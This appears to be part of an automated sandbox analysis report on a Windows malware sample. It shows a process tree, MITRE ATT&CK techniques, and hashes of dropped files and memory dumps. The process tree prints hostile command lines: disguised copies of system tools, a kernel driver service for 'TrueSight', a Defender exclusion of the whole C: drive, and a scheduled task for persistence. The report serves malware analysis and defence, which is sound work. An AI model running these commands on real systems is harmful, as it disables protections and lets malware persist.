      Suspicious use of WriteProcessMemory
      PID:3672
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:4736
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4756
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WbckutgxF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3640
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5108
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1400
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
        9⤵
        
        PID:5076
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
        9⤵
        
        PID:3432
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
        9⤵
        
        PID:4356
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4400
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        10⤵
        Executes dropped EXE
        
        PID:3888
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2456
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif start TrueSight
        10⤵
        Executes dropped EXE
        
        PID:1624
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2700
        
        C:\Users\Public\aken.pif
        
        C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4392
      - C:\Users\Public\Libraries\xgtukcbW.pif
        
        C:\Users\Public\Libraries\xgtukcbW.pif
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\Trading_AIBot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Trading_AIBot.exe"
        7⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\ACCApi'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3124
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /tn AccSys /tr "C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe" /st 13:36 /du 23:59 /sc daily /ri 1 /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2700
        
        C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe
        
        "C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\Microsofts.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsofts.exe"
        7⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:4932
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5112

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
PID:1272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:1692

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:2460

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:216

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
PID:224

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:4808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

Filesize
2.1MB

MD5
6fe5ab1777f59a47952c20a300d10cc2

SHA1
0c6548e98a4c6c79b7837648e7e7cf30c4618a20

SHA256
82eaf9787feaa1d8cb4e9527616e158cae027929fd1bae218ef135822990a94c

SHA512
d8e9d968cb87c3ca8585cfc80ef1aebf96897f22aa4a33e237577c1ec2c63f832893820ab052da04b8877bd61b839cfe7903f729c7b310dff0207bfc8b9c23b6

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
1.3MB

MD5
ae1596e3d3266cda911ced6bb85a4ab8

SHA1
26f84894fc9d54981c65cce63bf0f4a87d1daede

SHA256
597a62e602a3ea7b894976aac0517fd6d7da46ed3a1d93691bf3da6d4c05c293

SHA512
3f51b5255b3f9aa1520d22d363ed4ab91aaefb03c0caf0d5203f2df628d85718f06d4b08aa94ca2435223b683ed325f235a22f55c3adf93bc6fff96991e0c930

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
1.3MB

MD5
ea87721bbf0e379998d9d1dd432ce35c

SHA1
8742f66c976f022b9c47e772cd0e8c159ef6a6fd

SHA256
9dfaa5bb794754a8cf9ca5975985ab32d7ac8bdef9742f8dfd8d2c8cef4e87b7

SHA512
9c1910950a6b853aa30364b81e10942d7e9ed5ec1b3efa192794276c4e3c07513468e812300acc5a6209ddb7ee4ff6c5d551e1dd52f290c488cb228effdc5f43

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

Filesize
2.1MB

MD5
1496fa6a065812c39f92f9aa719dde74

SHA1
a716c1935cb01644b7ab8e161722d86b4ba958d9

SHA256
880c40bc12184124211664e3e2acd4dc1460e174d26eaf5d334f0ea406e9dbb1

SHA512
ecd75a5c1182cf9cff3e124011b3113c7bfd75a35b76ae0fdfc4f72c2cd941a26da017ae1ce87a97754f3bee52517a5e73089ee8cc02780d1e01d7c89697cecd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsofts.exe

Filesize
96KB

MD5
f6b8018a27bcdbaa35778849b586d31b

SHA1
81bde9535b07e103f89f6aeabdb873d7e35816c2

SHA256
ddc6b2bd4382d1ae45bee8f3c4bb19bd20933a55bdf5c2e76c8d6c46bc1516ce

SHA512
aa958d22952d27bad1c0d3c9d08ddbf364274363d5359791b7b06a5d5d91a21f57e9c9e1079f3f95d7ce5828dcd3e79914ff2bd836f347b5734151d668d935de

Download Submit
C:\Users\Admin\AppData\Local\Temp\Trading_AIBot.exe

Filesize
69KB

MD5
e91a1db64f5262a633465a0aaff7a0b0

SHA1
396e954077d21e94b7c20f7afa22a76c0ed522d0

SHA256
f19763b48b2d2cc92e61127dd0b29760a1c630f03ad7f5055fd1ed9c7d439428

SHA512
227d7dad569d77ef84326e905b7726c722ceff331246de4f5cf84428b9721f8b2732a31401df6a8cef7513bcd693417d74cdd65d54e43c710d44d1726f14b0c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwkqmb1x.3l1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
973KB

MD5
72d63924b474c076c3f54e556dcd3f8b

SHA1
bf448f7c1d3a8906b6c697d2f2dadf58e56f7bbf

SHA256
d78342ca78b975e822d380ccf2d2e8ec9dc910f91eefdeb049f28e7c97598c68

SHA512
b846ade542938e2b70375620c3d2b8e8c28b1232cbf3d11c62ba21109a2d1b1733b5951ba57f1369532bc5fd75cc7466eb8552bf8d439c39418048446aebba55

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\Libraries\NEO.cmd

Filesize
55KB

MD5
3c755cf5a64b256c08f9bb552167975c

SHA1
8c81ca56b178ffd77b15f59c5332813416d976d7

SHA256
12e0795aa1408bea69bfd0a53bb74558598e71b33fc12ffec0e0ae38d39da490

SHA512
8cf0f1a368089e2e3021ce6aeb4984821429d4bb9de3d273a9d0f571a847bba3fc429b84a877afec6decf40e6b94a69d52e8eeea55e042aa9773d3540dbe6bfa

Download Submit
C:\Users\Public\Libraries\xgtukcbW.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\Upha.pif

Filesize
70KB

MD5
3fb5cf71f7e7eb49790cb0e663434d80

SHA1
b4979a9f970029889713d756c3f123643dde73da

SHA256
41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9

SHA512
2b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5

Download Submit
C:\Users\Public\WbckutgxF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\aken.pif

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\alpha.pif

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\df.cmd

Filesize
973KB

MD5
fe9ba1e63886404362429422d9ec8846

SHA1
2e118b88683977b9b837a8f7211e49fb9ef966f9

SHA256
95e4f54d453befb480ab80aaa19d334064a1655f4c00ab2212bb1b34044809a8

SHA512
2bf72df9a3e925b188e0d04bede8103b0f585788c0ca9664ffb55facd095e557906d08769d6c154d9992378a0a936607bcdb587b7670447a9a64955b892ce696

Download Submit
C:\Users\Public\ript.exe

Filesize
157KB

MD5
24590bf74bbbbfd7d7ac070f4e3c44fd

SHA1
cdfe517d07f18623778829aa98d6bbadd3f294cd

SHA256
ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03

SHA512
ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9

Download Submit
C:\Windows \SysWOW64\netutils.dll

Filesize
116KB

MD5
0f088756537e0d65627ed2ea392dcaae

SHA1
983eb3818223641c13464831a2baad9466c3750f

SHA256
abe2b86bc07d11050451906dc5c6955e16341912a1da191fc05b80c6e2f44ad6

SHA512
d7ec6126467fd2300f2562be48d302513a92cee328470bf0b25b67dcf646ba6c824cd6195ba056b543db9e2a445991fe31ebc2f89d9eff084907d6af1384720d

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Filesize
1.2MB

MD5
fd4bc2c184e77abf8e485835f3ac4878

SHA1
0fd8e6bc6e001b4fd3dd85d8c2818677d994546d

SHA256
498d267e176a68d3803d2800c2bc42fd75ac9e324cbaa47b9819a477e6350827

SHA512
dd8f65e3f0e68f93c90eabdb8bb8ea9269cb596d2cdbe592b27b70e1f7f73845b1e892c0127a72fd86508632ef265dfc158168d014c9500f485434098de1457e

Download Submit
C:\Windows\System32\FXSSVC.exe

Filesize
1.2MB

MD5
b50dbe14c5c0224d14ded008bef4991a

SHA1
321a6fe84d3d8838f258f40106046e12e0d64fbd

SHA256
f6ce8ca5c955c8226ad6456f527eacc062a47a2d30e6a7a64e7de45fbeae4e32

SHA512
0a589b2be882c6aa954f92b9980adcf0ca59419036f358410a79d627d8e599143cc8ced6e300719a76ffc7d58de31db9b05ccc8edd4b62deab04d3f7540ad1e8

Download Submit
C:\Windows\System32\alg.exe

Filesize
1.2MB

MD5
a147e392406c2adcb0a5347b933611c0

SHA1
d9b664ce13ffd8e9820769b874cbdd24904883d7

SHA256
79e21ea690d3a139e23ded9ca75b534a8c05ea3c96f3fc276b60f802bf3c7f73

SHA512
b2c1e9c2d8924307c8c885a46f51a5edd999722443ce512637db722fa55fd773c816dc48ba0228cf8343547430bf6c5224a0aec3e9ab7623852a758c04271427

Download Submit
C:\Windows\system32\AppVClient.exe

Filesize
1.3MB

MD5
73c0412b715295eccb58a3fd56721229

SHA1
2c593ca7042418852688f968abfc23427c05c19d

SHA256
68a3a0795b6b9bb57741cd265759d702ac9de9b6f988e3373d4e69ea7a17c4f6

SHA512
78b5cb0fdfc0a1d22ea73ee9ce87726e759d2b7e12f0439567c0a2bba340a1baa454f00430d2dc3be9d6a93e139bb503848f0a93e7f4833b8a486c47f3aebf27

Download Submit
memory/216-652-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/216-889-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/224-727-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/224-666-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/1272-541-0x0000000140000000-0x000000014012F000-memory.dmp

Filesize
1.2MB

Download
memory/1600-667-0x0000000000390000-0x00000000003A8000-memory.dmp

Filesize
96KB

Download
memory/1600-668-0x0000000004C70000-0x0000000004D02000-memory.dmp

Filesize
584KB

Download
memory/2144-10-0x0000023F4ABF0000-0x0000023F4AC12000-memory.dmp

Filesize
136KB

Download
memory/2460-610-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/2460-888-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/2612-515-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2612-543-0x00000000326D0000-0x0000000032C74000-memory.dmp

Filesize
5.6MB

Download
memory/2612-531-0x00000000300E0000-0x0000000030124000-memory.dmp

Filesize
272KB

Download
memory/2612-544-0x00000000325E0000-0x0000000032624000-memory.dmp

Filesize
272KB

Download
memory/2612-665-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2872-857-0x0000000140000000-0x0000000140130000-memory.dmp

Filesize
1.2MB

Download
memory/2872-527-0x0000000140000000-0x0000000140130000-memory.dmp

Filesize
1.2MB

Download
memory/3124-876-0x0000000007820000-0x000000000782A000-memory.dmp

Filesize
40KB

Download
memory/3124-821-0x0000000005520000-0x0000000005B48000-memory.dmp

Filesize
6.2MB

Download
memory/3124-816-0x0000000004EB0000-0x0000000004EE6000-memory.dmp

Filesize
216KB

Download
memory/3124-822-0x00000000054B0000-0x00000000054D2000-memory.dmp

Filesize
136KB

Download
memory/3124-823-0x0000000005BC0000-0x0000000005C26000-memory.dmp

Filesize
408KB

Download
memory/3124-824-0x0000000005E20000-0x0000000005E86000-memory.dmp

Filesize
408KB

Download
memory/3124-830-0x0000000005E90000-0x00000000061E4000-memory.dmp

Filesize
3.3MB

Download
memory/3124-851-0x0000000006460000-0x000000000647E000-memory.dmp

Filesize
120KB

Download
memory/3124-855-0x00000000064F0000-0x000000000653C000-memory.dmp

Filesize
304KB

Download
memory/3124-873-0x0000000007440000-0x00000000074E3000-memory.dmp

Filesize
652KB

Download
memory/3124-862-0x00000000737D0000-0x000000007381C000-memory.dmp

Filesize
304KB

Download
memory/3124-872-0x00000000073D0000-0x00000000073EE000-memory.dmp

Filesize
120KB

Download
memory/3124-861-0x00000000073F0000-0x0000000007422000-memory.dmp

Filesize
200KB

Download
memory/3124-874-0x0000000007DF0000-0x000000000846A000-memory.dmp

Filesize
6.5MB

Download
memory/3124-875-0x00000000077A0000-0x00000000077BA000-memory.dmp

Filesize
104KB

Download
memory/3124-877-0x0000000007A20000-0x0000000007AB6000-memory.dmp

Filesize
600KB

Download
memory/3124-878-0x00000000079A0000-0x00000000079B1000-memory.dmp

Filesize
68KB

Download
memory/3124-879-0x00000000079D0000-0x00000000079DE000-memory.dmp

Filesize
56KB

Download
memory/3124-880-0x00000000079E0000-0x00000000079F4000-memory.dmp

Filesize
80KB

Download
memory/3124-881-0x0000000007AE0000-0x0000000007AFA000-memory.dmp

Filesize
104KB

Download
memory/3124-882-0x0000000007AC0000-0x0000000007AC8000-memory.dmp

Filesize
32KB

Download
memory/4756-86-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-103-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-57-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-56-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-54-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-60-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-61-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-62-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-63-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-65-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-66-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-67-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-68-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-69-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-70-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-71-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-73-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-74-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-88-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-75-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-76-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-91-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-77-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-93-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-49-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-78-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-95-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-79-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-97-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-80-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-98-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-81-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-101-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-50-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-82-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-59-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-83-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-84-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-52-0x0000000000400000-0x00000000004FC000-memory.dmp

Filesize
1008KB

Download
memory/4756-55-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-105-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-87-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-58-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-64-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-89-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-111-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-90-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-92-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-94-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-96-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
memory/4756-99-0x0000000002920000-0x0000000003920000-memory.dmp

Filesize
16.0MB

Download
